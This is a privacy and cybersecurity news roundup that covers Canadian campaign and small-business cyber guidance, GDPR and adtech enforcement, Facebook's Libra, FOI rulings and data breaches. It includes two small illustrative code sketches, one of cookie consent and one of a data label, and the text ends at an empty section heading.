If you are working on a political campaign, are a candidate, or are a political volunteer, you are poised to be a prime target for attempted foreign interference and cyber attacks in the coming federal election. That’s the message from the Communications Security Establishment [CSE] in its newly released “Cyber Security Guide for Campaign Teams” [see here]. It’s the first time a guide like this has been created by the federal electronic spy agency, and it comes after the Canadian Centre for Cyber Security issued reports in 2017 [see “Cyber Threats To Canada’s Democratic Process” here & 38 pg PDF here] and 2019 [see “2019 Update: Cyber Threats to Canada’s Democratic Process” – here & 28 pg PDF here] warning that foreign interference in the fall federal campaign is “very likely” and that political campaigns are among the higher-risk entities vulnerable to these attempts to meddle in the outcome of the election. The new guide includes general reminders (such as not using free Wi-Fi, using two-factor authentication, and being wary of clicking suspicious links) and offers tailored tips for campaign staff, such as making rules about who will have access to certain information, like account passwords or donor lists; how to secure information when many campaign workers will likely be bringing in their own devices; and what to do if social media accounts are compromised. CSE’s advice is summarized by these five steps:

  • Assess what cybersecurity means for your campaign;
  • Understand where your data lives;
  • Secure your data and technology;
  • Provide cybersecurity training; and
  • Know what to dispose of or archive.

[CTV News]

CA – CSE Releases New Baseline Cybersecurity Controls

On April 5, 2019, the Canadian Centre for Cyber Security [CCCS] released the Baseline Cyber Security Controls for Small and Medium Organizations [see here], intended to assist small and medium organizations in Canada that want recommendations to improve their cyber security resiliency. The centre, part of the Communications Security Establishment (equivalent to the U.S. National Security Agency), was founded last October to work collaboratively with Canada’s critical infrastructure, academia, private industry and all levels of government to combat cyber threats, manage government cybersecurity incidents and provide other cyber-related services, education, guidelines and training. The guidelines are intended to fill a critical gap for smaller enterprises that have been slow to adopt adequate cybersecurity protective measures. They are based on the so-called 80-20 rule: the idea that organizations can supposedly achieve 80% of the benefit from 20% of the effort by applying a focused set of cybersecurity practices. The guidelines therefore provide a condensed set of advice that the centre labels “baseline cyber security controls” or “baseline controls” – the most critical controls that smaller organizations (up to 499 employees) wishing to protect sensitive data should deploy to improve their cyber resiliency. Larger organizations are encouraged to invest in more comprehensive security coverage. The remainder of the post reviews the key recommendations, including:

  • Develop an incident response plan;
  • Automatically patch operating systems and applications;
  • Enable security software;
  • Securely configure devices;
  • Use strong user authentication;
  • Provide employee awareness training;
  • Back up and encrypt data;
  • Secure mobility;
  • Establish basic perimeter defences;
  • Secure cloud and outsourced IT services;
  • Secure websites;
  • Implement access control and authorization; and
  • Secure portable media.

The guidelines explicitly state that the foregoing baseline controls are intentionally aimed at small and medium-sized businesses to maximize the effectiveness of their limited cyber security spend, and that organizations looking to go beyond these controls should consider more comprehensive/robust cyber security measures such as the NIST Cyber Security Framework, the Center for Internet Security Controls, ISO/IEC 27001:2013 or the CCCS IT Security Risk Management: A Lifecycle Approach. However, there is little doubt that many small and medium-sized businesses will find the guidelines to be a useful, if somewhat limited, starting point for good cybersecurity practices. [Canadian Lawyer Magazine]

WW – New Guidelines Aim to Make Privacy Policies More Meaningful For Users

Openly Operated is a new set of guidelines that examines how apps and websites manage user data while working to make privacy policies relevant for users. The three steps a company must take to get OO’s stamp of approval are demonstrated transparency, a detailed privacy policy, and a final audit with published results. “We’ve kind of created this system today where the privacy policy is totally an afterthought for smaller companies. And for bigger companies, it becomes unmanageable, because you started out as a smaller company,” OO Co-Creator Johnny Lin said. “People before were taught to move fast and break things. Our solution is no, slow down — because when you do that user privacy goes in the backseat.” [The Verge]

E-Government

CA – Ontario Launches Digital and Data Task Force

Ontario’s government has unveiled the next phase of consultations for Ontario’s Data Strategy [PR], which aims to ensure Ontarians have a say in how data policy is shaped and how their personal privacy is protected. Lisa Thompson, Minister of Government and Consumer Services, announced the members of the Minister’s Digital and Data Task Force [see list and bios]. The second phase of consultations will include public and industry roundtables in six locations across the province from July through September [see here], and online options launching this summer will enable all people and businesses from across the province to share their input from anywhere, at any time. “During our first round of online consultations, the people of Ontario told us we need stronger data protections in place, and that they want to know and have control over how their data is used,” said Thompson. “Ontario’s Data Strategy will address their concerns” [see Phase 1 overview]. Here are some quick facts about Ontario’s Data Strategy:

  1. Global business revenues for big data and business analytics products and services are forecasted to reach $189 billion (US dollars) in 2019;
  2. The Ontario Data Strategy will focus on three key pillars of activity: promoting public trust and confidence, creating economic benefits, and enabling better, smarter, efficient government; and
  3. The Data Strategy will be developed in consultation with the public, and in response to recommendations in Ernst and Young’s Line-by-Line Review and the Auditor General’s December 2018 report. [Ministry of Government and Consumer Services]

US – US Federal Agencies Must Move to Electronic Record Keeping by 2022

The US Office of Management and Budget (OMB) is directing federal agencies to convert to all digital records by the end of 2022. The National Archives and Records Administration (NARA) will accept only digital records as of January 1, 2023. A recent audit of NARA’s electronic records management oversight found that the agency was “not effectively exercising its oversight authority. As a result, permanent electronic records are still at a significant risk of loss and destruction.” [www.whitehouse.gov: Transition to Electronic Records | www.meritalk.com: OMB Directs Agencies to Make All Records Electronic | www.fedscoop.com: OMB issues guidance on NARA’s transition to electronic record keeping | www.oversight.gov: Audit of NARA’s Oversight of Electronic Records Management in the Federal Government]

US – State AGs Demand Election Security Help

Attorneys general from 22 US states have asked Congress to offer more grants, equipment standards, and other kinds of election security support to local officials. A coalition of the attorneys general sent letters with the requests to the chairs and ranking members of the Senate Appropriations Committee and the Senate Rules Committee. [thehill.com: State attorneys general demand that Congress take action on election security | www.govinfosecurity.com: 22 State Attorneys General Seek Election Security Help]

EU Developments

UK – ICO Puts Adtech Industry on Notice for Data Practices

In its report on advertising technology and real-time bidding, the U.K. Information Commissioner’s Office states the entire adtech industry has been operating illegally. ICO Executive Director for Technology and Innovation Simon McDougall said companies have not properly gathered consent to use personal data to serve ads. The ICO cited a lack of transparency in how data is processed and sold in RTB scenarios. Rather than single out companies, the ICO has given the adtech industry a six-month grace period to shore up its practices. “If you operate in the adtech space, it’s time to look at what you’re doing now, and to assess how you use personal data,” McDougall said. [FT.com]

EU – Grand Coalition Reaches Deal to Alter Germany’s Privacy Laws

The CDU/CSU and the Social Democrats have reached a deal on a new bill that would bring federal laws in line with the EU General Data Protection Regulation, as well as alter the Federal German Privacy Act. The second Data Protection Adaptation and Implementation Act raises the employee threshold at which an organization must appoint a data protection officer from 10 to 20. The parties also aim to clarify GDPR exemptions for journalists. (Original articles are in German.) [Frankfurter Allgemeine]

EU – Irish DPC Releases Guidance for Securing Cloud-Based Environments

The Irish Data Protection Commission released guidance for organizations to follow in order to ensure their cloud-based environments are secure. The commission recommends organizations review their default security settings, create clear policies and properly train staff, understand and monitor the data that is stored in cloud-based environments, and implement strong authentication procedures. “Cloud-based environments offer many advantages to organisations; however, they also introduce a number of technical security risks which organisations should be aware of, including data breaches, hijacking of accounts, and unauthorised access to personal data,” the DPC said in a statement. “Organisations should determine and implement a documented policy and apply the appropriate technical security and organisational measures to secure any cloud-based environments they utilise.” [Data Protection.ie]

EU – French Consumer Group Files Class-Action Against Google For Alleged GDPR Violations

French consumer group UFC Que Choisir has filed a class-action lawsuit against Google for alleged violations of the EU General Data Protection Regulation. The group claims Google’s confidentiality rules are in violation of the GDPR as the company does not make it easy for consumers to block user-location tracking or targeted ads. “We have high standards for transparency and consent based on both guidance from regulators and robust user testing, and we provide helpful information and easy-to-use privacy controls in our products,” Google said in a statement. Meanwhile, Google and the University of Chicago face a potential class-action lawsuit over their data-sharing practices involving patient health data. [ABC News]

EU – EU Considers Curtailing Some Automated Surveillance

EU regulators are contemplating a ban on certain automated surveillance tools following a review panel’s suggestion to do so. The panel, made up of industry and academic analysts, has suggested that regulators amend laws to mitigate the risks posed by the possible misuse of artificial intelligence, including facial-recognition software. The European Commission plans to study the panel’s findings and suggestions, which could lead to amendment proposals in 2020. “When it comes to artificial intelligence, it is important that we all promote an approach centered around what is human, where we protect our fundamental rights,” European Commissioner for Digital Economy and Society Mariya Gabriel said. [WSJ.com]

EU – CNIL Releases Updated Version of Its PIA Software Tool

France’s data protection authority, the CNIL, has updated its open-source privacy impact assessment software to help data controllers learn and demonstrate their compliance with the EU General Data Protection Regulation. The PIA software is intended primarily for new data controllers or those new to the PIA process. The software offers a user-friendly interface for simple management, a legal and technical knowledge base to help ensure the rights of data subjects, and a customizable tool to help build compliance. The tool contains data from the GDPR, PIA guides and the security guide from the CNIL. Available in both French and English, the tool also helps demonstrate compliance to the CNIL. The IAPP Privacy Advisor featured an article on how to use the tool when the CNIL first launched the software. [CNIL.fr]

Finance

CA – Senate BANC Committee Issues Report on Open Banking

Last month, the Standing Senate Committee on Banking, Trade and Commerce [BANC] released its report on open banking [see Open Banking: What it Means for You & access other details] following hearings it held in the spring of 2019. The federal government, which has been conducting its own consultation [read PDF] into open banking, has yet to issue a report. ‘Open banking’ refers to a framework that enables consumers to share their personal financial data with financial services providers in a secure manner. Open banking is no small undertaking. To work, it will require major financial institutions to adopt standardized formats for data. It will also require the adoption of appropriate security measures. A regulator will have to create a list of approved open banking fintech providers. There will also need to be oversight from competition and privacy commissioners. For consumer privacy to be adequately protected, there will have to be an overhaul of Canada’s Personal Information Protection and Electronic Documents Act [see OPC guidance]. [Teresa Scassa Blog]

WW – Facebook Announces Creation of Cryptocurrency Service

Facebook has created a financial service powered by a cryptocurrency called Libra. Facebook partnered with companies such as Mastercard and Uber for the project in hopes of officially launching next year. Anyone who wants to acquire Libra tokens will need to go through the tech company’s new subsidiary, Calibra. Users will have to show a form of government identification in order to receive the tokens. “Your financial data will never be used to target ads on Facebook,” Calibra Vice President of Product Kevin Weil said. In response to the announcement, U.S. Rep. Maxine Waters, D-Calif., called on Facebook to “agree to a moratorium” on the project until Congress and regulators have a chance to examine the situation given concerns about Facebook’s recent activity. Fortune also reports on the potential privacy implications of Facebook’s Libra project. [New York Times | Techcrunch: Facebook announces Libra cryptocurrency: All you need to know | Facebook Libra is ‘most invasive and dangerous form of surveillance ever designed’, critics say | Facebook’s Libra ‘Cryptocurrency’ Aims to Disrupt Payments. Bitcoin Aims to Disrupt Government Power]

WW – Facebook’s Currency Libra Faces Financial, Privacy Pushback

Facebook is getting a taste of the regulatory pushback it will face as it creates a new digital currency with corporate partners. Just hours after the social media giant unveiled early plans for the Libra cryptocurrency, French Finance Minister Bruno Le Maire insisted that only governments can issue sovereign currencies. He said Facebook must ensure that Libra won’t hurt consumers or be used for illegal activities. “We will demand guarantees that such transactions cannot be diverted, for example for financing terrorism,” he said. Facebook unveiled its much-rumored currency Tuesday and said it will launch publicly early next year with such partners as Uber, Visa, Mastercard and PayPal. Libra could open online purchasing to millions of people who do not have access to bank accounts and could reduce the cost of sending money across borders. It’s easy to see how attractive an alternative like Libra could be to people in countries beset with hyperinflation such as Venezuela. Libra poses new questions for the social network: Given that cryptocurrency is lightly regulated now, if at all, how will financial regulators oversee Facebook’s plan? And just how much more personal data will this give the social media giant, anyway? In the U.S., Democratic Rep. Maxine Waters, the head of the House Financial Services Committee [here], wants Facebook to suspend plans for a new currency until Congress and regulators are able to study it more closely, saying: “Facebook is continuing its unchecked expansion and extending its reach into the lives of its users.” Sen. Sherrod Brown of Ohio, the senior Democrat on the Senate Banking Committee [here], said Facebook’s new digital currency will give the tech giant unfair competitive advantages in collecting data on financial transactions as well as control over fees. “Facebook is already too big and too powerful.” Brown and Waters both called on financial regulators to examine the new currency project closely. In a statement, Facebook said, “We look forward to responding to lawmakers’ questions as this process moves forward.” Cryptocurrencies such as Libra store all transactions on a widely distributed, encrypted ledger known as the blockchain. Libra is designed so transaction amounts are visible, but transaction participants can be anonymous — at least until they move money into real-world accounts. Facebook said people can keep their individual transactions from appearing on the blockchain by using Calibra’s wallet app, though in that case, Calibra itself would have people’s data. Calibra said it won’t use financial data to target ads on Facebook. It also said it won’t share financial data with Facebook, though there are exceptions that haven’t been fully spelled out, including situations where data sharing would “keep people safe.” [The Associated Press | Finance, privacy experts skeptical of Facebook’s cryptocurrency ambitions | Facebook ‘Too Powerful’ to Run Libra Without Rules, Says Democratic Senator | Senate panel schedules a hearing on Facebook’s cryptocurrency | Facebook to be grilled by Congress on libra currency | Facebook called before Senate panel over digital currency project | The Senate will hold a hearing next month on Facebook’s Libra currency | Facebook announces Libra cryptocurrency: All you need to know | Facebook Libra is ‘most invasive and dangerous form of surveillance ever designed’, critics say | Facebook’s Libra ‘Cryptocurrency’ Aims to Disrupt Payments. Bitcoin Aims to Disrupt Government Power]

EU – EU Banks Working to Boost Revenue through Data Mining

EU banks are trying to catch up to big tech companies in the monetization of the data they collect. JPMorgan, HSBC and Barclays are among those trying to close the gap by using tactics such as extracting and analyzing data for stock predictions, marketing partnerships and expedited credit decisions. “We are now seeing some amazing uses of data in banking, and the reason is pretty simple: they know their clients better than anyone, they have a name and address, information about what you’re buying and once you have those you can do so much,” Accenture Head of Data Monetization Craig Macdonald said. [Reuters]

FOI

US – SCOTUS Limits Access to Government Records, Drops Harm Requirement for Withholding “Confidential” Information

The Supreme Court narrowed public access to government documents by expanding the definition of “confidential” information. The 6-3 decision by Justice Gorsuch in Food Marketing Institute v. Argus Leader Media overturns four decades of case law which held that a company must show substantial competitive harm to block an open government request. Writing in dissent, Justice Breyer, joined by Justices Ginsburg and Sotomayor, emphasized that the FOIA required some showing of harm to prevent public release of business records collected by federal agencies. “The whole point of FOIA is to give the public access to information it cannot otherwise obtain.” In an amicus brief, EPIC warned the Court that removing the harm requirement “would deprive the public, and government watchdogs such as EPIC, of access to important information about ‘what the government is up to.’” EPIC described several of its own FOIA cases — including the now defunct airport body scanner program and the ongoing probe of Facebook — where access to commercial records made possible meaningful oversight and reform. Twenty members of the EPIC Advisory Board, distinguished experts in law, technology, and public policy, signed the amicus brief. [Electronic Privacy Information Center | Supreme Court limits access to government records in loss for Argus Leader, part of the USA TODAY Network | Politico | Opinion analysis: Court gives broad meaning to “confidential” in FOIA exemption for commercial and financial information]

CA – ‘Some Baloney’ in Claims about New Federal Access-to-Information System

Federal cabinet ministers were patting themselves on the back last week after Bill C-58 received royal assent [Legislative Summary & text]. The bill updates Ottawa’s oft-criticized access-to-information regime, which the Liberals had promised during the last election to strengthen. On June 21 Democratic Institutions Minister Karina Gould claimed: “The changes announced today enhance the transparency and accountability of Canadian democratic institutions by ensuring that Canadians can easily view the most often requested documents without having to file an access to information request.” The bill faced heavy criticism during the two years it took to wend its way through Parliament. One of the beefs was that the Liberals did not fulfil their promise to expand the act to include ministers’ offices. The government said it needed to balance transparency with parliamentary privilege. Largely overlooked was a section of the bill ordering the regular release of information about expenses incurred and contracts signed by senior government officials, members of Parliament, senators, ministers and federal judges. It also requires the disclosure of certain briefing notes for ministers and deputy ministers. So is it true that the changes to the access-to-information regime introduced by the Liberals ensure Canadians can easily view the most requested documents without having to file an access to information request? Gould’s remark earns a rating of “some baloney” by the Canadian Press Baloney Meter and here’s why: Thanks to Bill C-58, parliamentarians and the federal government will begin releasing more information to Canadians — some that is regularly requested through the access-to-information system and some that was never previously covered by the law. Yet aside from uncertainty about how often such information is requested, experts say the long timelines under which documents will be produced and the lack of oversight of the process raise questions about Gould’s statement. According to Sean Holman, an expert on open government at Mount Royal University in Calgary: “It’s not completely full of baloney, but it’s excluding so much information. It’s saying that this one change is going to enhance transparency and accountability. And it’s saying that (people) can easily view them. And those aren’t actually true statements. They’re very seriously shaded truth.” And Teresa Scassa, a Canada research chair in information law at the University of Ottawa, says: “I think there’s going to be more that’s available through proactive disclosure eventually. But these are cautious steps and it’s a matter of how it’s going to play out, how much will actually be made available and under what circumstances.” For those reasons, Gould’s statement is deemed to contain “some baloney.” [CTV News]

Genetics

US – DNA-Testing Companies Form Coalition for Genetic Data Protection

Ancestry, 23andMe and Helix announced they have formed the Coalition for Genetic Data Protection. Mehlman Castagnetti Rosen & Thomas Principal and Coalition Executive Director Steve Haro said the group’s goal is to educate the U.S. Congress on industry best practices and build trust with customers of the genetic-testing companies. “As the legislative interest has risen this year on both the federal and the state level, we all found ourselves getting questions from legislators and staffers,” 23andMe Chief Legal and Regulatory Officer Kathy Hibbs said. “We’re forming the coalition in order to provide interested legislators as well as the public and press with a single voice on these issues because we do agree on the importance of these issues.” Hibbs added any company that joins the coalition must follow the group’s best practices. [The Hill]

Health / Medical

EU – Dutch DPA Offers Recommendations for DPOs in Health Care Organizations

A study conducted by the Dutch data protection authority, Autoriteit Persoonsgegevens, found data protection officers function well within health care organizations. In response to the findings of the 11 hospitals analyzed, AP Board Member Monique Verdier said a DPO within a hospital can identify how well the organization has complied with privacy laws, which is beneficial to the agency. The AP offered recommendations for both board members and DPOs to help the latter in their position. The agency recommends board members should detail the DPO’s role within an internal privacy policy, while it advises DPOs to maintain a strong balance between their advisory and supervisory roles. [Source]

Horror Stories

CA – Desjardins Says PI of 2.9 Million Members Shared Illegally by Employee

Desjardins, Canada’s largest credit union, says that it has suffered a data security breach. An employee, who has since been fired, stole customer information from a Desjardins database and shared it with people outside the financial institution. The breach affected information belonging to 2.9 million members. The compromised data include names, social insurance numbers, email addresses, and details of banking habits. Desjardins has changed the procedure for authenticating customers’ identities so that the stolen information cannot be used for that purpose. [montrealgazette.com: Desjardins: Rogue employee caused data breach for 2.9 million members | www.cbc.ca: Personal data of 2.7 million people leaked from Desjardins | www.zdnet.com: Desjardins, Canada’s largest credit union, announces security breach | www.desjardins.com: Important message for our members – June 20, 2019 – 2:00 pm | Desjardins says personal info of 2.9 million members shared illegally by employee | The Many Costs of a Rogue Employee: Are Punitive Damages One of Them?]

WW – Phone Carrier Metadata Theft Likely the Work of Chinese Hackers

Researchers from Cybereason say that hackers that appear to be based in China have stolen metadata from at least 10 mobile phone service providers. The attack appears to be highly targeted; at one of the breached carriers, the hackers stole data related to just 20 specific individuals. The providers targeted in the attacks include companies in Asia, Africa, the Middle East, and Europe, but not North America. [www.wired.com: A Likely Chinese Hacker Crew Targeted 10 Phone Carriers to Steal Metadata | www.wsj.com: Global Telecom Carriers Attacked by Suspected Chinese Hackers (paywall) | www.cyberscoop.com: Chinese spies have been sucking up call records at multinational telecoms, researchers say]

US – Former Equifax Exec Gets Prison Sentence for Insider Trading

A former Equifax executive has been sentenced to four months in prison for insider trading related to his knowledge of the company’s 2017 data breach prior to its public disclosure. Jun Ying sold his Equifax stock for a gain of $480,000, avoiding a loss of $117,000. He has been ordered to pay $117,000 in restitution and $55,000 in fines. Ying is the second Equifax employee to be sentenced for insider trading stemming from the breach. [www.govinfosecurity.com: Ex-Equifax CIO Gets 4-Month Prison Term for Insider Trading]

US – Minnesota Police Officer Awarded $585,000 in Data Privacy Violation Case

A jury has awarded a Minneapolis, Minnesota police officer US $585,000 in a case involving violations of the state’s Driver’s Privacy Protection Act. In 2013, Amy Krekelberg learned that her DMV records had been accessed nearly 1,000 times over a 10-year period. Krekelberg, who was never under investigation, sued the city and two police officers who had accessed her information. Minneapolis city attorney Susan L. Segal said that in the past, officers had been encouraged to learn how the DMV database worked by looking up friends and family members. The rules have since changed and officers are now required to enter a reason for searching DMV records. [www.wired.com: Minnesota Cop Awarded $585K After Colleagues Snooped on Her DMV Data]

Identity Issues

UK – Adult Website Age-Verification System Delayed Six Months

U.K. Secretary of State for Digital, Culture, Media and Sport Jeremy Wright announced the country’s age-verification system for online pornography will be delayed for six months. The policy, which was slated to go into effect July 15, would require users to prove they are over the age of 18 in order to access websites with adult content. Wright said the delay was a result of the U.K.’s failure to comply with European law on passing statutory instruments. “In autumn last year, we laid three instruments before the house,” Wright said. “One of them sets out standards that companies need to comply with. This should have been notified to the European commission, and it was not. This will result in a delay in the region of six months.” [The Guardian]

US – Massive Data Breaches Undermine Reliability of Online Identity Verification

A report from the U.S. Government Accountability Office (GAO) says that large data breaches like the 2015 breach at the Office of Personnel Management and the 2017 Equifax breach have undermined online identity authentication processes. Prior to the Equifax breach, federal agencies used consumer reporting agencies (CRAs) to verify users’ identities. Now that so much information has been compromised, the method is no longer reliable. GAO conducted the study because it “was asked to review federal agencies’ remote identity proofing practices in light of the recent Equifax breach and the potential for fraud.” While 2017 guidance from the National Institute of Standards and Technology (NIST) basically prohibits agencies from using knowledge-based verification schemes for “sensitive applications,” some agencies have not moved away from knowledge-based identity verification, noting that barriers include costs “and implementation challenges for certain segments of the public.” [fcw.com: Your personal data is too public for agencies to verify | www.zdnet.com: Equifax breach impacted the online ID verification process at many US govt agencies | www.gao.gov: Federal Agencies Need to Strengthen Online Identity Verification Processes (PDF) | pages.nist.gov: NIST Special Publication 800-63A: Digital Identity Guidelines (2017)]

Internet / WWW

UK – ICO Admits Its Own Website Fails to Comply With GDPR

The ICO has been forced to own up to the fact that its current consent notice relating to the use of cookies on mobile devices failed “to meet the required GDPR standard”. The confession came after Adam Rose, a lawyer at Mishcon de Reya, discovered the privacy screw-up, which saw the ICO relying on “implied consent” to automatically place cookies on mobile devices when visitors accessed its website. Rose argued that this was a breach of Regulation 6 of the Privacy and Electronic Communications Regulations (PECR) 2003. PECR – which sits alongside GDPR – prohibits the storage of, or access to, information held on a user’s device unless explicit consent is given. This is even explained clearly on the ICO’s website, where the watchdog warns companies that: “You must tell people if you set cookies, and clearly explain what the cookies do and why. You must also get the user’s consent. Consent must be actively and clearly given.” Rose argued that because of the ICO’s use of implied consent, which saw cookies used automatically, users were unable to reject their use. In an email sent to Rose, the ICO confessed: “I acknowledge that the current cookies consent notice on our website doesn’t meet the required GDPR standard.” [The Inquirer | UK data regulator admits its own website does not conform to GDPR | Data Notes: Cookie Compliance: How can companies get it right when the regulator does not?]
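
To make the rule concrete, here is a minimal sketch (Python with Flask; the route and cookie names are illustrative assumptions, not code from the ICO or any regulator) of the distinction at issue: non-essential cookies are set only after an affirmative opt-in, never implied from continued browsing.

# Minimal sketch of PECR-style cookie consent: non-essential cookies are
# written only after the user actively opts in. Route and cookie names
# here are hypothetical, invented for illustration.
from flask import Flask, make_response, request

app = Flask(__name__)

@app.route("/")
def index():
    # Absence of a recorded opt-in means no non-essential cookies are set.
    consented = request.cookies.get("cookie_consent") == "yes"
    resp = make_response("analytics on" if consented else "no non-essential cookies")
    if consented:
        # Only after an affirmative act may a non-essential cookie be set.
        resp.set_cookie("analytics_id", "abc123", samesite="Lax")
    return resp

@app.route("/consent", methods=["POST"])
def give_consent():
    # Triggered by an explicit user action (e.g., clicking an "Accept"
    # button); merely continuing to browse is never treated as consent.
    resp = make_response("consent recorded")
    resp.set_cookie("cookie_consent", "yes", samesite="Lax")
    return resp

if __name__ == "__main__":
    app.run()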

WW – IAB Launches Programs with New Data Transparency Standard

IAB Tech Lab has released new systems aimed at creating more transparency with third-party data. IAB is rolling out a new standardization system for the data while also implementing auditing and credentialing programs for those selling data. The information includes specific dates of user ID collections, URLs, location data and indications on whether lookalike modeling is included in a segment. “We’re hopeful publishers will adopt it to describe their first-party data as well,” IAB Tech Lab General Manager Dennis Buchheim said. “Because in some ways they are the key here as both data sellers and data buyers.” Buchheim added there’s potential for the addition of consent information to the standard in the future. [AdExchanger]
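
The standard amounts to a metadata record, or “data label,” attached to an audience segment. As a rough illustration only (the field names below are invented for this sketch and do not reproduce IAB Tech Lab’s actual schema), such a label might be represented as:

# Hypothetical sketch of the kinds of disclosures described above; these
# field names are invented, not IAB Tech Lab's published schema.
segment_label = {
    "segment_name": "auto_intenders_q3",
    "data_seller": "ExampleDataCo",       # entity subject to audit/credentialing
    "id_collection_window": {             # when the user IDs were collected
        "start": "2019-04-01",
        "end": "2019-06-30",
    },
    "source_urls": ["https://cars.example.com"],  # where the data was gathered
    "location_data_included": True,
    "lookalike_modeling_used": False,     # real users only, no modeled expansion
}

print(segment_label)

A buyer could then filter or discount segments on fields such as lookalike_modeling_used or the collection window before transacting, which is the transparency the programs aim to enable.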

Law Enforcement

US – Supreme Court Allows Warrantless Blood Draws of Unconscious Drivers

The U.S. Supreme Court ruled that exigent circumstances allow police to draw blood from an unconscious driver without his permission and without a warrant if the police suspect that the driver is under the influence of alcohol. The decision in Mitchell v. Wisconsin comes just three years after the Court ruled that police generally do need to get a warrant to perform blood tests if a driver does not voluntarily consent. And the Court’s judgment actually dodged the major question presented by the case: whether a state can force a citizen to consent in advance to warrantless blood tests as a condition of driving. [Reason]

Location

US – Ad Groups Prep Companies on Location Data Use Ahead of CCPA

The Mobile Marketing Association and the Network Advertising Initiative have worked to prepare companies for sharing consumer location data ahead of the California Consumer Privacy Act. The groups have advised companies to be more transparent about how the online ad industry monetizes location data. The MMA has raised funds to establish the Location Privacy Alliance in hopes of creating self-regulatory guidelines for companies that have business models centered on such information. The NAI has asked its own members to raise the age of consent of addressable audiences from 13 to 16 as it plans to implement a new Code of Conduct next year. [Adweek]

Online Privacy

UK – ICO Publishes Report on Adtech, RTB

The U.K. Information Commissioner’s Office published an updated report on its research into advertising technology and real-time bidding. The agency focused on the processing of special data categories, data protection impact assessments and transparency. The ICO found the adtech industry to be “immature in its understanding of data protection requirements. Whilst the automated delivery of ad impressions is here to stay, we have general, systemic concerns around the level of compliance of RTB.” The report also outlined the ICO’s next steps to better understand adtech and RTB. Meanwhile, publisher group DCN wrote in a letter to European regulators “the sky won’t fall” if RTB were to switch to non-personal data. [ICO.org.uk]

US – FTC Asked to Investigate Practice of ‘Surveillance Scoring’

Nonprofit group Consumer Education Foundation has filed a petition with the U.S. Federal Trade Commission asking the agency to explore if the use of surveillance scores constitutes “unfair or deceptive practices” under the FTC Act. The petition identifies dozens of U.S. businesses known to use surveillance scores and 11 U.S.-based firms that provide the scores, as well as describing how as many as 121 analytics companies “categorize, grade, or assign a numerical value to a consumer based on the consumer’s estimated predicted behavior.” The foundation claims the data gathered from the scores is kept hidden with no option to appeal. [Gizmodo]

WW – Privacy Risks in Social Media Groups

Millions of people use social media platforms to seek health advice and support. However, social media platforms fall outside federal health privacy laws as long as they don’t offer medical services, which puts the onus on online group moderators to follow platform rules on privacy and redact sensitive information before posting. If a third party leaks a user’s personal information, the moderator, rather than the social media platform, may be the one held responsible. “The Health Insurance Portability and Accountability Act applies to healthcare providers, healthcare plans and clearinghouses, not to any random company that collects data about your physical or mental health,” said Georgetown Law Communications and Technology Clinic Staff Attorney and Teaching Fellow Lindsey Barrett. [Bloomberg Law]

WW – Study Reveals How Websites Deploy ‘Dark Patterns’ to Online Users

A Princeton University study explores the prevalent use of “dark patterns” to manipulate the decisions of online consumers. Researchers examined more than 10,000 sites and found that more than 1,200 used the patterns, including ThredUp’s fake notifications, among other misleading tactics. Arunesh Mathur, Princeton doctoral student and one of the authors of the report, said the research had a limited scope as the study’s software only scanned retail sites, which leaves the possibility of dark patterns being used more frequently on other sites. The study comes months after members of the U.S. Senate proposed a bill to regulate the use of dark patterns by social media companies. France’s data protection authority also recently released a report on dark patterns. [New York Times]

Privacy (US)

US – FTC Launches Investigation into YouTube Over Alleged COPPA Violations

The U.S. Federal Trade Commission announced it has launched an investigation into YouTube for alleged violations of the Children’s Online Privacy Protection Act. The agency had received complaints from consumer groups and privacy advocates that claimed the platform improperly gathered young users’ data. “YouTube is a really high-profile target, and for obvious reasons because all of our kids are on it,” said Groman Consulting Principal Consultant Marc Groman. “But the issues on YouTube that we’re all grappling with are elsewhere and everywhere.” YouTube Spokeswoman Andrea Faville did not comment on the FTC investigation; however, she said while some of the ideas to improve the platform are not developed, others “like our restrictions to minors live-streaming or updated hate speech policy” have been created and launched. [Wash Post | Claims YouTube Illegally Tracked Kids Reportedly Spark Federal Investigation | YouTube under federal investigation over allegations it violates children’s privacy | YouTube Weighs Major Changes to Kids’ Content Amid FTC Probe]

US – FTC, Justice Dept. Takes Coordinated Action Against Robocallers

Federal authorities have announced their latest crackdown on illegal robocallers, taking close to a hundred actions against companies and individuals blamed for the recent barrage of spam calls. In the so-called “Operation Call It Quits,” the Federal Trade Commission brought four cases — two filed on its behalf by the Justice Department — and three settlements in cases said to be responsible for making more than a billion illegal robocalls [read detailed FTC PR]. Several state and local authorities also brought actions as part of the operation, officials said. Each year, billions of automatically dialed or spoofed phone calls trick millions into picking up the phone. An annoyance at best, at worst they trick unsuspecting victims into turning over cash or buying fake or misleading products. So far, the FTC has fined companies more than $200 million but has collected less than 0.01% of the fines because of the agency’s limited enforcement powers. With this new wave of action, the FTC said it is sending a strong signal to the robocalling industry. It’s the second time the FTC has acted in as many months. In May, the agency also took action against four companies accused of making “billions” of robocalls [read detailed FTC PR here]. The FTC said its latest action brings the number of robocall violators pursued up to 145. Several of the cases involved shuttering operations that offer consumers “bogus” credit card interest rate reduction services, which the FTC said specifically targeted seniors. Other cases involved the use of illegal robocalls to promote money-making schemes. Another case involved Lifewatch, a company pitching medical alert systems, which the FTC contended used spoofed caller ID information to trick victims into picking up the phone. The company settled for $25.3 million. The robocalling epidemic has caught the attention of the Federal Communications Commission, which regulates the telecom and internet industries. Last month, its commissioners proposed a new rule that would make it easier for carriers to block robocalls. [TechCrunch | FTC crackdown targets operators behind 1 billion robocalls]

US – Sen. Merkley Wants Collection Methods for Driver Data to be Revealed

U.S. Sen. Jeff Merkley, D-Ore., has sent a letter to 13 car manufacturers calling for more transparency regarding the collection of driver data. Merkley is seeking clarity on whether or not the companies are collecting data, and if so, he wants to know details on the type of data, ownership and storage. “While data plays an integral role in advancing new technology to maximize consumer benefits and bolster the American automotive industry, it is necessary to understand the scope, purpose, and extent to which our cars collect data,” Merkley wrote. “It is understandable that this data is used to improve performance and safety, though it may be unclear to many consumers what level of ownership they have over the data collected by the car they own or are leasing.” Merkley is hoping for a response from companies within 30 days. [Merkley.senate.gov]

US – EFF Reveals Top Priorities for Consumer Data Privacy Laws

